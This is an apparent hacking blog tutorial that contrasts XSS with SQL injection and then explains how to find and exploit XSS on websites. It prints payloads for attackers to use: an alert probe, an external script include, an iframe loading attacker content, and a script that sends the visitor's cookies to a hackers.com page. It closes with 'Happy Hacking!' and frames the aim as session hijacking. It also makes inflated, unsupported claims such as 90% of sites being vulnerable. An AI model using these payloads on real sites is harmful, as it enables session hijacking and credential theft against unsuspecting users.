Cross-site
scripting (Popularly known as XSS) and SQL injection errors are two prominent
vulnerabilities that have been responsible for a large number of security
breaches in recent years. XSS is a huge problem in current scenario as most of
the web developers are even not aware of this kind of attack. The basic
differences between SQL Injection & XSS are:
- SQL Injection is the injection of SQL Statements whereas XSS is the Injection of Codes (It can be Javascript, PHP code, VB Code or even regular HTML Codes.
- SQL Injection is injecting a SQL statement into the query execution function in the server side script. But, XSS can be both Client & Server Side. (Stored or persistent XSS is Server Side whereas Non-persistent is Client Side as an attacker needs to insert code each time.)
Together XSS
and SQL Injection is the most deadly combination that can be found today and
more than 90% of the sites are vulnerable to any one of the following. In SQL
injection, the user can add additional conditions or commands to a database
query, thus allowing the user to bypass authentication or alter data. With XSS,
an attacker can inject this own HTML (including JavaScript or other executable
code) into a web page; this is exploitable in many ways, up to complete
compromise of the browser. XSS is used by a phisher to inject credential
stealing code into official sites without having to redirect the user to a copy
of the site. This means that any security credentials will be valid on the
attack site and even white-listing will not prevent the attack.
So, let’s start
how this XSS Attack actually takes place.
XSS Attack
can be of many types:
Non-persistent or reflected
DOM-based or Local cross-site scripting
Stored or persistent
Now have a look
at an example. Let's say that we have a vulnerable page. A malicious user, Hacker,
posts a "special_code" post, containing the following:
<script type="text/javascript" src="http://victimwebsite.com/xss.js"></script>
If the page is vulnerable, then
everyone who visits the page, the browser will fetch the file located at
http://victimwebsite.com/xss.js, and then execute the code in it.
How to find if a website is vulnerable to XSS?
To find out if any website is
vulnerable to XSS, what you need to do is just insert the script into any
search or input text field.
<script>alert(“hi”);</script>
If upon Submitting, the page
return an alert with “hi” in it, then that particular website should be
vulnerable to XSS Attack.
Now you can
insert link to any third party website or fake login page in the script tag and
that link gets stored with the original content. We can also insert links to
javascripts, which will allow the hacker to run malicious code included in the
javascript upon page reloading and basically hijack any session of users
accessing that particular page. Session hijacking refers to the fact that the
hacker can now login into the website without even victim’s username or
password. This is done by inserting cookie stealing code in the javascript.
We can insert link to any image
into the vulnerable website by giving the following script in the search or
text input field which is vulnerable to XSS.
<iframe src=”url of the fake page” width=”1000” height=”1000” />
It can be anything like:
<iframe src=”http://www.hacker.com/hacked.jpg” width=”1000”
height=”1000” />
One can also paste pages into the
victim website:
<script>document.location.href="http://www.hackers.com/steal_cookies.php"+document.cookie;
</script>
Hope,
you enjoyed and learnt a lot.
Happy
Hacking!
For Any Ques Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Contact ==> www.facebook.com/ryan.manjothi
Posts
0 comments:
Post a Comment